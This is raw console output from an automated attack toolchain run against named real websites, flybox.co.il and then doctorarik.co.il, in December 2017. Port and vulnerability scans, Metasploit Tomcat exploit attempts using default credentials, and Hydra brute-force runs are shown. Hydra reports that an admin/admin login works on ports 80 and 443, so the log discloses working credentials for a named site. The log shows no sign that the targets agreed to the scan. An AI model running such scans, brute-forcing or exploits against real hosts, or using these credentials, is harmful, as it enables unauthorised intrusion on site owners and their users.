- + Cookie __cfduid created without the secure flag
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'cf-ray' found, with contents: 3d5c8d721bb70eeb-EWR
- + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + All CGI directories 'found', use '-C none' to test none
- + Hostname 'flybox.co.il' does not match certificate's names: sni165065.cloudflaressl.com
- + Scan terminated: 20 error(s) and 6 item(s) reported on remote host
- + End Time: 2017-12-31 05:29:19 (GMT-5) (48 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- [92m + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +[0m
- [91m[+][0m Screenshot saved to /usr/share/sniper/loot/screenshots/flybox.co.il-port443.jpg
- [91m + -- --=[Port 445 closed... skipping.[0m
- [91m + -- --=[Port 512 closed... skipping.[0m
- [91m + -- --=[Port 513 closed... skipping.[0m
- [91m + -- --=[Port 514 closed... skipping.[0m
- [91m + -- --=[Port 623 closed... skipping.[0m
- [91m + -- --=[Port 624 closed... skipping.[0m
- [91m + -- --=[Port 1099 closed... skipping.[0m
- [91m + -- --=[Port 1433 closed... skipping.[0m
- [91m + -- --=[Port 2049 closed... skipping.[0m
- [91m + -- --=[Port 2121 closed... skipping.[0m
- [91m + -- --=[Port 3306 closed... skipping.[0m
- [91m + -- --=[Port 3310 closed... skipping.[0m
- [91m + -- --=[Port 3128 closed... skipping.[0m
- [91m + -- --=[Port 3389 closed... skipping.[0m
- [91m + -- --=[Port 3632 closed... skipping.[0m
- [91m + -- --=[Port 4443 closed... skipping.[0m
- [91m + -- --=[Port 5432 closed... skipping.[0m
- [91m + -- --=[Port 5800 closed... skipping.[0m
- [91m + -- --=[Port 5900 closed... skipping.[0m
- [91m + -- --=[Port 5984 closed... skipping.[0m
- [91m + -- --=[Port 6000 closed... skipping.[0m
- [91m + -- --=[Port 6667 closed... skipping.[0m
- [91m + -- --=[Port 8000 closed... skipping.[0m
- [91m + -- --=[Port 8100 closed... skipping.[0m
- [93m + -- --=[Port 8080 opened... running tests...[0m
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://flybox.co.il:8080
- The site http://flybox.co.il:8080 is behind a CloudFlare
- Number of requests: 1
- [1m[34mhttp://flybox.co.il:8080[0m [523 Unassigned] [1m[37mCloudFlare[0m, [1m[37mCookies[0m[[37m__cfduid,cf_ob_info,cf_use_ob[0m], [1m[37mCountry[0m[[37mUNITED STATES[0m][[1m[31mUS[0m], [1m[37mHTML5[0m, [1m[37mHTTPServer[0m[[1m[36mcloudflare[0m], [1m[37mHttpOnly[0m[[37m__cfduid[0m], [1m[37mIP[0m[[37m104.31.75.239[0m], [1m[37mJQuery[0m, [1m[37mScript[0m[[37mtext/javascript[0m], [1m[37mTitle[0m[[1m[33mflybox.co.il | 523: Origin is unreachable[0m], [1m[37mUncommonHeaders[0m[[37mcf-ray[0m], [1m[37mX-Frame-Options[0m[[37mSAMEORIGIN[0m], [1m[37mX-UA-Compatible[0m[[37mIE=Edge[0m]
- [94m __ ______ _____ [0m
- [94m \ \/ / ___|_ _|[0m
- [94m \ /\___ \ | | [0m
- [94m / \ ___) || | [0m
- [94m /_/\_|____/ |_| [0m
- [94m+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield[0m
- [94m+ -- --=[Target: flybox.co.il:8080[0m
- [92m+ -- --=[Site not vulnerable to Cross-Site Tracing![0m
- [92m+ -- --=[Site not vulnerable to Host Header Injection![0m
- [92m+ -- --=[Site not vulnerable to Cross-Frame Scripting![0m
- [92m+ -- --=[Site not vulnerable to Clickjacking![0m
- [93mHTTP/1.1 405 Not Allowed
- Date: Sun, 31 Dec 2017 10:29:55 GMT
- Content-Type: text/html
- Content-Length: 177
- Connection: close
- Server: cloudflare-nginx
- CF-RAY: -
- <html>
- <head><title>405 Not Allowed</title></head>
- <body bgcolor="white">
- <center><h1>405 Not Allowed</h1></center>
- <hr><center>cloudflare-nginx</center>
- </body>
- </html>
- [0m
- [93mHTTP/1.1 523 Origin Unreachable
- Date: Sun, 31 Dec 2017 10:29:56 GMT
- Content-Type: text/html; charset=UTF-8
- Transfer-Encoding: chunked
- Connection: keep-alive
- Set-Cookie: __cfduid=d23ab0e266a46bb002f6d1ad600a8e45e1514716196; expires=Mon, 31-Dec-18 10:29:56 GMT; path=/; domain=.flybox.co.il; HttpOnly
- Expires: Thu, 01 Jan 1970 00:00:01 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- X-Frame-Options: SAMEORIGIN
- Set-Cookie: cf_use_ob=8080; expires=Sun, 31-Dec-17 10:30:26 GMT; path=/
- Set-Cookie: cf_ob_info=523:3d5c8f82b55969a6:CDG; expires=Sun, 31-Dec-17 10:30:26 GMT; path=/
- Server: cloudflare
- CF-RAY: 3d5c8f82b55969a6-CDG
- 1614
- <!DOCTYPE html>
- <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
- <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
- <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
- <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
- <head>
- <meta [0m
- Version: [32m1.11.10-static[0m
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- [0m
- Testing SSL server [32mflybox.co.il[0m on port [32m8080[0m using SNI name [32mflybox.co.il[0m
- [1;34mTLS Fallback SCSV:[0m
- Server [31mdoes not[0m support TLS Fallback SCSV
- [1;34mTLS renegotiation:[0m
- Session renegotiation [32mnot supported[0m
- [1;34mTLS Compression:[0m
- Compression [32mdisabled[0m
- [1;34mHeartbleed:[0m
- TLS 1.2 [32mnot vulnerable[0m to heartbleed
- TLS 1.1 [32mnot vulnerable[0m to heartbleed
- TLS 1.0 [32mnot vulnerable[0m to heartbleed
- [1;34mSupported Server Cipher(s):[0m
- ââââ âââââ âââ ââââââ ââââââ ââââ âââ ââââââ ââââââ âââââââ [0m
- âââââââ âââââââââ âââ â âââ â âââââââ ââââ ââ â ââ â ââââ âââ[0m
- âââ âââââââ âââ â ââââ â ââââ ââââ âââââââ ââââ ââââ âââ ââ[0m
- âââ âââ âââââââââ â âââ â âââââââââ ââââ âââ â âââ â ââââ â[0m
- ââââ ââââ ââ âââââââââââââââââââââââââ ââââââââââââââââââââââââââââââââ [0m
- â ââ â â ââ âââââ âââ â ââ âââ â ââââââââââ âââ âââ ââ âââ ââ â âââ â [0m
- â â â â ââ ââ ââ â ââ ââ â ââââ â â â â â â â â â â â â â â [0m
- â â â â â â â â â â â â â â â â â â â [0m
- â â â â â â â â â â â â â [0m
- â â [0m
- [91m+ -- --=[MÃÅÅBÄ»ÃÃÄ V20160303 BÅž 1Å 3 @ ÄÅÃÅŽÄÅÈÃÃÄ»Ä - https://crowdshield.com[0m
- [91m+ -- --=[Scan Complete![0m
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 104.31.75.239
- + Target Hostname: flybox.co.il
- + Target Port: 8080
- + Start Time: 2017-12-31 05:29:58 (GMT-5)
- ---------------------------------------------------------------------------
- + Server: cloudflare
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'cf-ray' found, with contents: 3d5c8f9133b91043-CDG
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + All CGI directories 'found', use '-C none' to test none
- + Server banner has changed from 'cloudflare' to 'cloudflare-nginx' which may suggest a WAF, load balancer or proxy is in place
- + Scan terminated: 17 error(s) and 3 item(s) reported on remote host
- + End Time: 2017-12-31 07:29:00 (GMT-5) (7142 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 07:29 EST
- Nmap scan report for flybox.co.il (104.31.75.239)
- Host is up (2.8s latency).
- Other addresses for flybox.co.il (not scanned): 2400:cb00:2048:1::681f:4aef 2400:cb00:2048:1::681f:4bef 104.31.74.239
- PORT STATE SERVICE VERSION
- 8080/tcp filtered http-proxy
- Too many fingerprints match this host to give specific OS details
- Network Distance: 9 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 2780.34 ms 10.13.0.1
- 2 2794.33 ms 37.187.24.253
- 3 2787.36 ms 10.50.225.60
- 4 2790.85 ms 10.17.129.42
- 5 2783.87 ms 10.73.0.54
- 6 ...
- 7 2801.39 ms be100-1110.th2-1-a9.fr.eu (213.186.32.215)
- 8 ...
- 9 2799.89 ms 104.31.75.239
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 21.58 seconds
- [0m[36m[0m[37m
- Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
- EFLAGS: 00010046
- eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
- esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
- ds: 0018 es: 0018 ss: 0018
- Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
- [1m
- Stack: 90909090990909090990909090
- 90909090990909090990909090
- 90909090.90909090.90909090
- 90909090.90909090.90909090
- 90909090.90909090.09090900
- 90909090.90909090.09090900
- ..........................
- cccccccccccccccccccccccccc
- cccccccccccccccccccccccccc
- ccccccccc.................
- cccccccccccccccccccccccccc
- cccccccccccccccccccccccccc
- .................ccccccccc
- cccccccccccccccccccccccccc
- cccccccccccccccccccccccccc
- ..........................
- ffffffffffffffffffffffffff
- ffffffff..................
- ffffffffffffffffffffffffff
- ffffffff..................
- ffffffff..................
- ffffffff..................
- [0m
- [33mCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00[0m
- Aiee, Killing Interrupt handler
- [31mKernel panic: Attempted to kill the idle task!
- In swapper task - not syncing[0m
- [0m
- =[ [33mmetasploit v4.16.26-dev[0m ]
- + -- --=[ 1714 exploits - 975 auxiliary - 300 post ]
- + -- --=[ 507 payloads - 40 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- [0m[0mRHOST => flybox.co.il
- [0m[1m[31m[-][0m WAR file not found
- [1m[34m[*][0m Auxiliary module execution completed
- [0m[0mRHOSTS => flybox.co.il
- [0m[1m[33m[!][0m RHOST is not a valid option for this module. Did you mean RHOSTS?
- RHOST => flybox.co.il
- [0mRPORT => 8080
- [0m[1m[34m[*][0m Scanned 1 of 4 hosts (25% complete)
- [1m[34m[*][0m Scanned 2 of 4 hosts (50% complete)
- [1m[34m[*][0m Scanned 3 of 4 hosts (75% complete)
- [1m[34m[*][0m Scanned 4 of 4 hosts (100% complete)
- [1m[34m[*][0m Auxiliary module execution completed
- [0m[0m[1m[34m[*][0m Attempting to connect to 2400:cb00:2048:1::681f:4aef:8080
- [1m[32m[+][0m No File(s) found
- [1m[34m[*][0m Scanned 1 of 4 hosts (25% complete)
- [1m[34m[*][0m Attempting to connect to 2400:cb00:2048:1::681f:4bef:8080
- [1m[32m[+][0m No File(s) found
- [1m[34m[*][0m Scanned 2 of 4 hosts (50% complete)
- [1m[34m[*][0m Attempting to connect to 104.31.75.239:8080
- [1m[32m[+][0m No File(s) found
- [1m[34m[*][0m Scanned 3 of 4 hosts (75% complete)
- [1m[34m[*][0m Attempting to connect to 104.31.74.239:8080
- [1m[32m[+][0m No File(s) found
- [1m[34m[*][0m Scanned 4 of 4 hosts (100% complete)
- [1m[34m[*][0m Auxiliary module execution completed
- [0m[0m[1m[34m[*][0m http://[2400:cb00:2048:1::681f:4aef]:8080/admin/j_security_check - Checking j_security_check...
- [1m[34m[*][0m http://[2400:cb00:2048:1::681f:4aef]:8080/admin/j_security_check - Server returned: 403
- [1m[31m[-][0m http://[2400:cb00:2048:1::681f:4aef]:8080/admin/j_security_check - Unable to enumerate users with this URI
- [1m[34m[*][0m Scanned 1 of 4 hosts (25% complete)
- [1m[34m[*][0m http://[2400:cb00:2048:1::681f:4bef]:8080/admin/j_security_check - Checking j_security_check...
- [1m[34m[*][0m http://[2400:cb00:2048:1::681f:4bef]:8080/admin/j_security_check - Server returned: 403
- [1m[31m[-][0m http://[2400:cb00:2048:1::681f:4bef]:8080/admin/j_security_check - Unable to enumerate users with this URI
- [1m[34m[*][0m Scanned 2 of 4 hosts (50% complete)
- [1m[34m[*][0m http://104.31.75.239:8080/admin/j_security_check - Checking j_security_check...
- [1m[34m[*][0m Scanned 3 of 4 hosts (75% complete)
- [1m[34m[*][0m http://104.31.74.239:8080/admin/j_security_check - Checking j_security_check...
- [1m[31m[-][0m http://104.31.74.239:8080/admin/j_security_check - Unable to enumerate users with this URI
- [1m[34m[*][0m Scanned 4 of 4 hosts (100% complete)
- [1m[34m[*][0m Auxiliary module execution completed
- [0m[0m[1m[31m[-][0m http://2400:cb00:2048:1::681f:4aef:8080 - Authorization not requested
- [1m[34m[*][0m Scanned 1 of 4 hosts (25% complete)
- [1m[31m[-][0m http://2400:cb00:2048:1::681f:4bef:8080 - Authorization not requested
- [1m[34m[*][0m Scanned 2 of 4 hosts (50% complete)
- [1m[31m[-][0m http://104.31.75.239:8080/manager/html - No response
- [1m[34m[*][0m Scanned 3 of 4 hosts (75% complete)
- [1m[31m[-][0m http://104.31.74.239:8080/manager/html - No response
- [1m[34m[*][0m Scanned 4 of 4 hosts (100% complete)
- [1m[34m[*][0m Auxiliary module execution completed
- [0m[0m[1m[31m[-][0m Exploit aborted due to failure: not-found: The target server fingerprint "cloudflare-nginx ( 403-Forbidden )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
- [1m[34m[*][0m Exploit completed, but no session was created.
- [0m[0mUSERNAME => tomcat
- [0mPASSWORD => tomcat
- [0m[1m[31m[-][0m Exploit aborted due to failure: not-found: The target server fingerprint "cloudflare-nginx ( 403-Forbidden )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
- [1m[34m[*][0m Exploit completed, but no session was created.
- [0m[91m + -- --=[Port 8180 closed... skipping.[0m
- [93m + -- --=[Port 8443 opened... running tests...[0m
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://flybox.co.il:8443
- The site http://flybox.co.il:8443 is behind a CloudFlare
- Number of requests: 1
- [1m[34mhttp://flybox.co.il:8443[0m [400 Bad Request] [1m[37mCloudFlare[0m, [1m[37mCountry[0m[[37mUNITED STATES[0m][[1m[31mUS[0m], [1m[37mHTTPServer[0m[[1m[36mcloudflare-nginx[0m], [1m[37mIP[0m[[37m104.31.74.239[0m], [1m[37mTitle[0m[[1m[33m400 The plain HTTP request was sent to HTTPS port[0m], [1m[37mUncommonHeaders[0m[[37mcf-ray[0m]
- [94m __ ______ _____ [0m
- [94m \ \/ / ___|_ _|[0m
- [94m \ /\___ \ | | [0m
- [94m / \ ___) || | [0m
- [94m /_/\_|____/ |_| [0m
- [94m+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield[0m
- [94m+ -- --=[Target: flybox.co.il:8443[0m
- Version: [32m1.11.10-static[0m
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- [0m
- Testing SSL server [32mflybox.co.il[0m on port [32m8443[0m using SNI name [32mflybox.co.il[0m
- [1;34mTLS Fallback SCSV:[0m
- Server [31mdoes not[0m support TLS Fallback SCSV
- [1;34mTLS renegotiation:[0m
- [32mSecure[0m session renegotiation supported
- [1;34mTLS Compression:[0m
- Compression [32mdisabled[0m
- [1;34mHeartbleed:[0m
- TLS 1.2 [32mnot vulnerable[0m to heartbleed
- TLS 1.1 [32mnot vulnerable[0m to heartbleed
- TLS 1.0 [32mnot vulnerable[0m to heartbleed
- [1;34mSupported Server Cipher(s):[0m
- [32mPreferred[0m TLSv1.2 [32m256[0m bits [32mECDHE-ECDSA-CHACHA20-POLY1305[0m Curve P-256 DHE 256
- Accepted TLSv1.2 [32m128[0m bits [32mECDHE-ECDSA-AES128-GCM-SHA256[0m Curve P-256 DHE 256
- Accepted TLSv1.2 [32m128[0m bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 [32m128[0m bits ECDHE-ECDSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 [32m256[0m bits [32mECDHE-ECDSA-AES256-GCM-SHA384[0m Curve P-256 DHE 256
- Accepted TLSv1.2 [32m256[0m bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 [32m256[0m bits ECDHE-ECDSA-AES256-SHA384 Curve P-256 DHE 256
- [32mPreferred[0m TLSv1.1 [32m128[0m bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 [32m256[0m bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
- [32mPreferred[0m [33mTLSv1.0[0m [32m128[0m bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
- Accepted [33mTLSv1.0[0m [32m256[0m bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
- [1;34mSSL Certificate:[0m
- Signature Algorithm: ecdsa-with-SHA256
- Subject: sni165065.cloudflaressl.com
- Altnames: DNS:sni165065.cloudflaressl.com, DNS:*.aonlineorder.tk, DNS:*.bestproductthisyear.tk, DNS:*.bigsale135store.tk, DNS:*.bigsale171store.tk, DNS:*.bigsale215store.tk, DNS:*.bigsale248store.tk, DNS:*.bigsale281store.tk, DNS:*.bjfhiu.tk, DNS:*.bsmartbuyer.tk, DNS:*.bsmartonlineshop.tk, DNS:*.btokoonlinemurah.tk, DNS:*.budgettrouwfilm.nl, DNS:*.dbranded.tk, DNS:*.eawesomemarket.tk, DNS:*.emmom.tk, DNS:*.flybox.co.il, DNS:*.fmarketplus.tk, DNS:*.ftopbuy.tk, DNS:*.h1xv9oacp.ga, DNS:*.ialliexpress.tk, DNS:*.iowist.com, DNS:*.ipaytoko.tk, DNS:*.iperfectmarket.tk, DNS:*.ismartxpress.tk, DNS:*.jsmartonlineshop.tk, DNS:*.jtopcharts.tk, DNS:*.lalliexpress.tk, DNS:*.lpayperclick.tk, DNS:*.lpremiumonlineshop.tk, DNS:*.onlinekanyakumari.com, DNS:*.osmartbuyer.tk, DNS:*.pawesomemarket.tk, DNS:*.pbelimudah.tk, DNS:*.rlinkaliexpress.tk, DNS:*.rnesaliexpress.tk, DNS:*.samriddle.website, DNS:*.snapcracka.us, DNS:*.stokoonlinemurah.tk, DNS:*.taeaj.tk, DNS:*.techxpertsllc.com, DNS:*.vbrs.co.uk, DNS:*.wholesaleonline114.tk, DNS:*.wholesaleonline4.tk, DNS:*.wholesaleonline55.tk, DNS:*.wittcatt.stream, DNS:aonlineorder.tk, DNS:bestproductthisyear.tk, DNS:bigsale135store.tk, DNS:bigsale171store.tk, DNS:bigsale215store.tk, DNS:bigsale248store.tk, DNS:bigsale281store.tk, DNS:bjfhiu.tk, DNS:bsmartbuyer.tk, DNS:bsmartonlineshop.tk, DNS:btokoonlinemurah.tk, DNS:budgettrouwfilm.nl, DNS:dbranded.tk, DNS:eawesomemarket.tk, DNS:emmom.tk, DNS:flybox.co.il, DNS:fmarketplus.tk, DNS:ftopbuy.tk, DNS:h1xv9oacp.ga, DNS:ialliexpress.tk, DNS:iowist.com, DNS:ipaytoko.tk, DNS:iperfectmarket.tk, DNS:ismartxpress.tk, DNS:jsmartonlineshop.tk, DNS:jtopcharts.tk, DNS:lalliexpress.tk, DNS:lpayperclick.tk, DNS:lpremiumonlineshop.tk, DNS:onlinekanyakumari.com, DNS:osmartbuyer.tk, DNS:pawesomemarket.tk, DNS:pbelimudah.tk, DNS:rlinkaliexpress.tk, DNS:rnesaliexpress.tk, DNS:samriddle.website, DNS:snapcracka.us, DNS:stokoonlinemurah.tk, DNS:taeaj.tk, DNS:techxpertsllc.com, DNS:vbrs.co.uk, DNS:wholesaleonline114.tk, DNS:wholesaleonline4.tk, DNS:wholesaleonline55.tk, DNS:wittcatt.stream
- Issuer: COMODO ECC Domain Validation Secure Server CA 2
- Not valid before: [32mDec 17 00:00:00 2017 GMT[0m
- Not valid after: [32mJun 25 23:59:59 2018 GMT[0m
- ââââ âââââ âââ ââââââ ââââââ ââââ âââ ââââââ ââââââ âââââââ [0m
- âââââââ âââââââââ âââ â âââ â âââââââ ââââ ââ â ââ â ââââ âââ[0m
- âââ âââââââ âââ â ââââ â ââââ ââââ âââââââ ââââ ââââ âââ ââ[0m
- âââ âââ âââââââââ â âââ â âââââââââ ââââ âââ â âââ â ââââ â[0m
- ââââ ââââ ââ âââââââââââââââââââââââââ ââââââââââââââââââââââââââââââââ [0m
- â ââ â â ââ âââââ âââ â ââ âââ â ââââââââââ âââ âââ ââ âââ ââ â âââ â [0m
- â â â â ââ ââ ââ â ââ ââ â ââââ â â â â â â â â â â â â â â [0m
- â â â â â â â â â â â â â â â â â â â [0m
- â â â â â â â â â â â â â [0m
- â â [0m
- [91m+ -- --=[MÃÅÅBÄ»ÃÃÄ V20160303 BÅž 1Å 3 @ ÄÅÃÅŽÄÅÈÃÃÄ»Ä - https://crowdshield.com[0m
- [91m+ -- --=[Scan Complete![0m
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 104.31.75.239
- + Target Hostname: flybox.co.il
- + Target Port: 8443
- ---------------------------------------------------------------------------
- + SSL Info: Subject: /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=sni165065.cloudflaressl.com
- Ciphers: ECDHE-ECDSA-CHACHA20-POLY1305
- Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO ECC Domain Validation Secure Server CA 2
- + Start Time: 2017-12-31 07:35:44 (GMT-5)
- ---------------------------------------------------------------------------
- + Server: cloudflare
- + Cookie __cfduid created without the secure flag
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'cf-ray' found, with contents: 3d5d47cf2eb2472e-EWR
- + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + All CGI directories 'found', use '-C none' to test none
- + Hostname 'flybox.co.il' does not match certificate's names: sni165065.cloudflaressl.com
- + Scan terminated: 20 error(s) and 6 item(s) reported on remote host
- + End Time: 2017-12-31 07:44:35 (GMT-5) (531 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 07:44 EST
- Nmap scan report for flybox.co.il (104.31.74.239)
- Host is up (0.15s latency).
- Other addresses for flybox.co.il (not scanned): 2400:cb00:2048:1::681f:4aef 2400:cb00:2048:1::681f:4bef 104.31.75.239
- PORT STATE SERVICE VERSION
- 8443/tcp filtered https-alt
- Too many fingerprints match this host to give specific OS details
- Network Distance: 9 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 45.65 ms 10.13.0.1
- 2 45.70 ms 37.187.24.253
- 3 45.66 ms 10.50.225.60
- 4 45.71 ms 10.17.129.40
- 5 45.62 ms 10.73.0.50
- 6 45.72 ms 10.95.33.10
- 7 59.64 ms be100-1110.th2-1-a9.fr.eu (213.186.32.215)
- 8 59.62 ms cloudflare.par.franceix.net (37.49.237.49)
- 9 59.57 ms 104.31.74.239
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 18.83 seconds
- [91m + -- --=[Port 8888 closed... skipping.[0m
- [91m + -- --=[Port 10000 closed... skipping.[0m
- [91m + -- --=[Port 16992 closed... skipping.[0m
- [91m + -- --=[Port 27017 closed... skipping.[0m
- [91m + -- --=[Port 27018 closed... skipping.[0m
- [91m + -- --=[Port 27019 closed... skipping.[0m
- [91m + -- --=[Port 28017 closed... skipping.[0m
- [91m + -- --=[Port 49152 closed... skipping.[0m
- [92m + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +[0m
- [92m + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +[0m
- [92m + -- ----------------------------=[Running Brute Force]=--------------------- -- +[0m
- [91m __________ __ ____ ___[0m
- [91m \______ \_______ __ ___/ |_ ____ \ \/ /[0m
- [91m | | _/\_ __ \ | \ __\/ __ \ \ / [0m
- [91m | | \ | | \/ | /| | \ ___/ / \ [0m
- [91m |______ / |__| |____/ |__| \___ >___/\ \ [0m
- [91m \/ \/ \_/[0m
- [91m + -- --=[BruteX v1.7 by 1N3[0m
- [91m + -- --=[http://crowdshield.com[0m
- [92m################################### Running Port Scan ##############################[0m
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 07:44 EST
- Nmap scan report for flybox.co.il (104.31.74.239)
- Host is up (0.64s latency).
- Other addresses for flybox.co.il (not scanned): 2400:cb00:2048:1::681f:4aef 2400:cb00:2048:1::681f:4bef 104.31.75.239
- Not shown: 23 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 80/tcp open http
- 443/tcp open https
- 8080/tcp open http-proxy
- Nmap done: 1 IP address (1 host up) scanned in 14.17 seconds
- [92m################################### Running Brute Force ############################[0m
- [91m + -- --=[Port 21 closed... skipping.[0m
- [91m + -- --=[Port 22 closed... skipping.[0m
- [91m + -- --=[Port 23 closed... skipping.[0m
- [91m + -- --=[Port 25 closed... skipping.[0m
- [92m + -- --=[Port 80 opened... running tests...[0m
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2017-12-31 07:45:09
- [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
- [DATA] attacking http-get://flybox.co.il:80//
- [80][http-get] host: flybox.co.il login: admin password: admin
- [STATUS] attack finished for flybox.co.il (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2017-12-31 07:45:13
- [91m + -- --=[Port 110 closed... skipping.[0m
- [91m + -- --=[Port 139 closed... skipping.[0m
- [91m + -- --=[Port 162 closed... skipping.[0m
- [91m + -- --=[Port 389 closed... skipping.[0m
- [92m + -- --=[Port 443 opened... running tests...[0m
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2017-12-31 07:45:13
- [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
- [DATA] attacking http-gets://flybox.co.il:443//
- [443][http-get] host: flybox.co.il login: admin password: admin
- [STATUS] attack finished for flybox.co.il (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2017-12-31 07:45:18
- [91m + -- --=[Port 445 closed... skipping.[0m
- [91m + -- --=[Port 512 closed... skipping.[0m
- [91m + -- --=[Port 513 closed... skipping.[0m
- [91m + -- --=[Port 514 closed... skipping.[0m
- [91m + -- --=[Port 993 closed... skipping.[0m
- [91m + -- --=[Port 1433 closed... skipping.[0m
- [91m + -- --=[Port 1521 closed... skipping.[0m
- [91m + -- --=[Port 3306 closed... skipping.[0m
- [91m + -- --=[Port 3389 closed... skipping.[0m
- [91m + -- --=[Port 5432 closed... skipping.[0m
- [91m + -- --=[Port 5900 closed... skipping.[0m
- [91m + -- --=[Port 5901 closed... skipping.[0m
- [91m + -- --=[Port 8000 closed... skipping.[0m
- [92m + -- --=[Port 8080 opened... running tests...[0m
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2017-12-31 07:45:18
- [91m + -- --=[Port 8100 closed... skipping.[0m
- [91m + -- --=[Port 6667 closed... skipping.[0m
- #######################################################################################################################################
- Hostname www.doctorarik.co.il ISP Bezeq International (AS8551)
- Continent Asia Flag
- IL
- Country Israel Country Code IL (ISR)
- Region Unknown Local time 31 Dec 2017 06:09 IST
- City Unknown Latitude 31.5
- IP Address 62.219.91.10 Longitude 34.75
- #######################################################################################################################################
- [i] Scanning Site: http://doctorarik.co.il
- B A S I C I N F O
- ====================
- [+] Site Title: הרזיה, הרזיה בריאה, הרזיה נכונה- מרפאת הרזיה של ד"ר אריק ויסבורד
- [+] IP address: 62.219.91.10
- [+] Web Server: Microsoft-IIS/7.5
- [+] CMS: WordPress
- [+] Cloudflare: Not Detected
- [+] Robots File: Could NOT Find robots.txt!
- W H O I S L O O K U P
- ========================
- % The data in the WHOIS database of the .il registry is provided
- % by ISOC-IL for information purposes, and to assist persons in
- % obtaining information about or related to a domain name
- % registration record. ISOC-IL does not guarantee its accuracy.
- % By submitting a WHOIS query, you agree that you will use this
- % Data only for lawful purposes and that, under no circumstances
- % will you use this Data to: (1) allow, enable, or otherwise
- % support the transmission of mass unsolicited, commercial
- % advertising or solicitations via e-mail (spam);
